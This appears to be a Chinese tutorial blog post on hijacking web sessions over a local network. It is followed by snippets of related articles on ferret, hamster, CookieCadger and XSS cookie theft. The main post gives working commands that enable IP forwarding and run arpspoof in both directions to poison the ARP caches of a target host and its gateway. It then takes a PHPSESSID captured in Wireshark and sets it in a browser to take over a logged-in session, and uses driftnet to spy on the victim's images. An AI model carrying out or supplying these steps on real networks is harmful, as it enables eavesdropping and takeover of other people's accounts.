利用arpspoof进行cookie会话劫持

最新推荐文章于 2025-06-28 12:00:00 发布
转载 最新推荐文章于 2025-06-28 12:00:00 发布 · 2.1k 阅读 · 3

本文介绍如何通过arpspoof工具实现中间人攻击,完成对目标主机的cookie会话劫持。首先开启IP转发功能,然后通过ARP毒化欺骗目标主机和网关,最终获取并利用PHPSESSID进行登录状态劫持。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

利用arpspoof进行cookie会话劫持

1.开启IP转发

root@kali-PC:~# echo 1 > /proc/sys/net/ipv4/ip_forward

2.基本信息

A:本机信息

192.168.1.104

B:.靶机

192.168.1.108

C:网关

root@kali-PC:~# route 
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.1.1     0.0.0.0         UG    0      0        0 wlan0
192.168.1.0     *               255.255.255.0   U     0      0        0 wlan0

2.ARP毒化,向攻击机声称自己(攻击者)就是网关
root@kali-PC:~# arpspoof -i wlan0 -t 192.168.1.108 192.168.1.1

3.ARP毒化,向网关声称自己(攻击者)就是网关
root@kali-PC:~# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.108

4.wireshark抓包


图中PHPSESSID的值是我们后续要用的

5.劫持会话

打开相应网站,把PHPSESSID的值设置为19b924ccbdda14b0da297664904e9129,然后刷新网页,此时可看到已经是登录后状态了




6.延伸:监控靶机上打开的图片

root@kali-PC:~# driftnet -i wlan0 -b -v
driftnet: using temporary file directory /tmp/drifnet-YHw0gx
driftnet: listening on wlan0 in promiscuous mode
driftnet: using filter expression `tcp'
driftnet: started display child, pid 4442
driftnet: link-level header length is 14 bytes
.driftnet: new connection: 61.155.222.133:80 -> 192.168.1.108:47590
..driftnet: new connection: 192.168.1.108:47590 -> 61.155.222.133:80
..........driftnet: new connection: 192.168.1.104:60461 -> 61.155.222.133:80
..driftnet: new connection: 61.155.222.133:80 -> 192.168.1.104:60461
............driftnet: new connection: 192.168.1.108:39835 -> 216.58.221.142:443
..........driftnet: new connection: 192.168.1.108:39836 -> 216.58.221.142:443
......................................................................driftnet: new connection: 192.168.1.108:39835 -> 216.58.221.142:443
..........driftnet: new connection: 192.168.1.108:39836 -> 216.58.221.142:443
......

会话劫持一—劫持Cookie重放流量
afei001
02-17 584
实验环境 攻击机kali IP:192.168.3.147 靶机win 7 IP:192.168.3.128 工具 arpspoof    进行arp欺骗 wireshark   抓包 ferret       重新生成抓包后的文件 hamster     劫持重放流量 1.首先使用arpspoof进行arp欺骗 root@afei:~# echo 1 &...
会话劫持三—CookieCadger实现一键会话劫持
afei001
02-23 761
实验环境 攻击机kali   IP:192.168.3.147 靶机win 7    IP:192.168.3.128 工具 CookieCadger   一键会话劫持 arpspoof        进行arp欺骗 CookieCadger简介     CookieCadger是一款cookie嗅探工具,可以劫持局域网中的cookie,重放流量。 Cook...
arpspoof
11-23
进行arp欺骗的软件
cookies劫持
qq_44504968的博客
01-07 361
一.实验基础 kali(zenmap,wireshark,hamster) 物理机 二.实验步骤 1.修改kali与物理机的网卡适配器,保证虚拟机中的kali系统能够和外部网络通信(若不可以关掉防火墙) 2.修改kali镜像源 #vim /etc/apt/sources.list deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-f...
常见的会话劫持攻击是指什么?
最新发布
wanhengidc的博客
06-28 245
会话劫持攻击是一种常见的网络安全攻击,恶意攻击者通过窃取用户的会话标识符号来接管用户的会话,当攻击者或者有效的会话标识符,那么就可以借取正常用户的数据信息,来访问目标用户的账号,并进行各种操作,来修改或者盗取重要的数据信息,以此来给用户造成巨大的经济损失。企业在防范会话劫持攻击可以从多个方面入手,其中包括使用定期更新和配置安全的网络架构等,以此来有效抵御会话劫持攻击,保护用户的数据信息和服务器的安全性。
cookie劫持
qq_35490522的博客
08-02 446
XSS是什么?它的全名是:Cross-sitescripting,为了和CSS层叠样式表区分所以取名XSS。是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击的主要目的则是,想办法获取目标攻击网站的cookie,因为有了cookie相当于有了seesion,有了这些信息就可以在任意能接进互联网的pc登陆该网站,并以其他人的生份登陆,做一些破坏。预防措施,防止下发界面显示html标签
E022-渗透测试常用工具-使用ferret进行Cookie劫持.pdf
12-02
在这个过程中,使用了ferret工具来执行Cookie劫持,这是一种常见的攻击手段,用于获取用户的登录凭据,特别是那些存储在Cookie中的会话ID。以下是整个过程的详细解释: 1. **环境准备**: 在这个场景中,我们有两...
会话劫持 Kali
05-05 2443
1.工具介绍 网络数据包信息收集工具ferret-sidejack 网络数据包传递用户的各种操作和对应的信息。但是由于各种数据混在一起,不利于渗透测试人员分析。Kali Linux提供了一款信息搜集工具ferret-sidejack。该工具既可以从网络接口直接读取数据,也可以读取数据抓包文件。该工具会过滤掉大部分格式性数据,只保留更为有价值的数据,如IP地址、Mac地址、主机名、操作类型...
渗透测试教程:利用ferret执行Cookie劫持
"该资源是一份关于渗透测试的教程,主要讲解如何利用工具ferret进行Cookie劫持。课程中提供了具体的服务器和客户端环境,并通过实际操作步骤指导如何进行网络连通性测试、主机探测、IP转发、ARP欺骗等操作,为实现...
arpspoof2.1
12-23
arpspoof2.1版本,绝对可用,不错的资源,可实现单向和双向欺骗,内涵源码
ArpSpoof-arp欺骗.rar
04-03
arp欺骗工具,windows系统使用
Web安全之Cookie劫持
weixin_33895475的博客
10-01 172
  1. Cookie是什么?   2. 窃取的原理是什么?   3. 系统如何防Cookie劫持呢?   看完这三个回答, 你就明白哪位传奇大侠是如何成功的!!!   Cookie:   HTTP天然是无状态的协议, 为了维持和跟踪用户的状态, 引入了Cookie和Session. Cookie包含了浏览器客户端的用户凭证, 相对较小. Session则维护在服务器, 用于维护相对较大...
说说劫持 Cookie 的原理
weixin_34329187的博客
04-06 663
完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。 Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。 1 窃取 Cookie 首先先在存在 XSS 漏洞的网站,加载一段远程脚本,形...
PHP安全编程之cookie暴露导致session被劫持
爱代码也爱生活
08-10 1995
使用Cookie而产生的一个风险是用户的cookie会被攻击者所盗窃。如果会话标识保存在cookie中,cookie的暴露就是一个严重的风险,因为它能导致会话劫持。 PHP为你处理相关会话管理的复杂过程 最常见的cookie暴露原因是浏览器漏洞和跨站脚本攻击(见专题前几部分)。虽然现在并没有已知的该类浏览器漏洞,但是以往出现过几例,其中最有名的一例同时发生在IE浏览器的4.0,
利用Backtrack劫持cookie
Coisini的博客
06-15 286
1、前言 还在用没有加密的wifi看微博吗? 小心您的cookie被人劫持,微博被人盗用! 本文我们将介绍如何使用arpspoof与wireshark和cookie injector脚本来劫持腾讯微博的cookie 2、arp毒化 开启内核IP转发:echo ”1″ > /proc/sys/net/ipv4/ip_forward 通过traceroute命令追踪网关地址,我们发现目前网关地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值